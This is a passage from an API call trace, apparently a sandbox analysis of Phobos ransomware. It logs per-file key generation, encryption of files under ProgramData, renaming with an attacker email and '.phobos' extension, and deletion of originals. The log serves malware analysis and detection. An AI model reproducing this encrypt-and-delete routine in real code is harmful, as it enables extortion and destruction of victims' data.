liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0165.114] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0165.142] SetEndOfFile (hFile=0x148) returned 1 [0165.142] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0xb9ba2f7, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0165.142] WriteFile (in: hFile=0x148, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0165.144] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x3dfe0fd, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0165.144] WriteFile (in: hFile=0x148, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0165.554] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0165.554] WriteFile (in: hFile=0x148, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0165.554] CloseHandle (hObject=0x148) returned 1 [0165.555] SetEvent (hEvent=0xe8) returned 1 [0165.556] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0165.556] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0165.559] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=206316) returned 1 [0165.559] CloseHandle (hObject=0x148) returned 1 [0165.559] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w")) returned 0x2026 [0165.559] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.560] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0165.560] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0165.560] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0165.560] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.560] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ca8) returned 1 [0165.560] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0165.560] ReadFile (in: hFile=0x148, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x325ec, lpOverlapped=0x0) returned 1 [0165.625] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x325f0, dwBufLen=0x325f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x325f0) returned 1 [0165.626] WriteFile (in: hFile=0x134, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x325f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x325f0, lpOverlapped=0x0) returned 1 [0165.633] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0165.633] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0165.633] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0165.633] CryptDestroyKey (hKey=0xa32c68) returned 1 [0165.633] WriteFile (in: hFile=0x134, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0165.633] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.633] CloseHandle (hObject=0x148) returned 1 [0165.633] CloseHandle (hObject=0x134) returned 1 [0165.633] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w")) returned 1 [0165.635] SetEvent (hEvent=0xe8) returned 1 [0165.635] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0165.635] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.635] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=14660) returned 1 [0165.635] CloseHandle (hObject=0x134) returned 1 [0165.636] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d")) returned 0x2026 [0165.636] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.636] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.636] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0165.636] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0165.636] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0165.636] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ca8) returned 1 [0165.636] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0165.636] ReadFile (in: hFile=0x134, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x3944, lpOverlapped=0x0) returned 1 [0165.675] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3950, dwBufLen=0x3950 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3950) returned 1 [0165.675] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x3950, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x3950, lpOverlapped=0x0) returned 1 [0165.676] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0165.676] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0165.676] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0165.676] CryptDestroyKey (hKey=0xa32c68) returned 1 [0165.676] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0165.676] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.676] CloseHandle (hObject=0x134) returned 1 [0165.676] CloseHandle (hObject=0x148) returned 1 [0165.676] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d")) returned 1 [0165.677] SetEvent (hEvent=0xe8) returned 1 [0165.677] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0165.677] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0165.679] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=47) returned 1 [0165.679] CloseHandle (hObject=0x148) returned 1 [0165.679] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f")) returned 0x2024 [0165.679] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.679] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0165.679] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0165.679] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0165.679] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.828] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ca8) returned 1 [0165.828] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0165.828] ReadFile (in: hFile=0x148, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2f, lpOverlapped=0x0) returned 1 [0165.829] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30, dwBufLen=0x30 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30) returned 1 [0165.829] WriteFile (in: hFile=0x134, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x30, lpOverlapped=0x0) returned 1 [0165.830] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0165.830] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0165.830] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0165.830] CryptDestroyKey (hKey=0xa32c68) returned 1 [0165.830] WriteFile (in: hFile=0x134, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0165.830] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.830] CloseHandle (hObject=0x148) returned 1 [0165.830] CloseHandle (hObject=0x134) returned 1 [0165.830] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f")) returned 1 [0165.831] SetEvent (hEvent=0xe8) returned 1 [0165.832] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0165.832] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0165.833] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=14972) returned 1 [0165.833] CloseHandle (hObject=0x158) returned 1 [0165.833] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl")) returned 0x20 [0165.833] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.833] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0165.833] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0165.833] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0165.833] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0165.867] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32c68) returned 1 [0165.875] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0165.875] ReadFile (in: hFile=0x158, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x3a7c, lpOverlapped=0x0) returned 1 [0165.899] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3a80, dwBufLen=0x3a80 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3a80) returned 1 [0165.899] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x3a80, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x3a80, lpOverlapped=0x0) returned 1 [0165.900] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0165.900] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0165.900] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0165.900] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.900] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0165.900] CryptDestroyKey (hKey=0xa32c68) returned 1 [0165.900] CloseHandle (hObject=0x158) returned 1 [0165.900] CloseHandle (hObject=0x14c) returned 1 [0165.901] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl")) returned 1 [0165.902] SetEvent (hEvent=0xe8) returned 1 [0165.902] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0165.902] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0165.902] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=25214) returned 1 [0165.903] CloseHandle (hObject=0x14c) returned 1 [0165.903] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico")) returned 0x2020 [0165.903] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.903] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0165.903] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0165.903] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0165.903] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0165.903] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32c68) returned 1 [0165.903] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0165.903] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x627e, lpOverlapped=0x0) returned 1 [0166.103] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6280, dwBufLen=0x6280 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6280) returned 1 [0166.103] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x6280, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x6280, lpOverlapped=0x0) returned 1 [0166.104] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0166.104] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.104] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0166.104] CryptDestroyKey (hKey=0xa327e8) returned 1 [0166.104] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0166.104] CryptDestroyKey 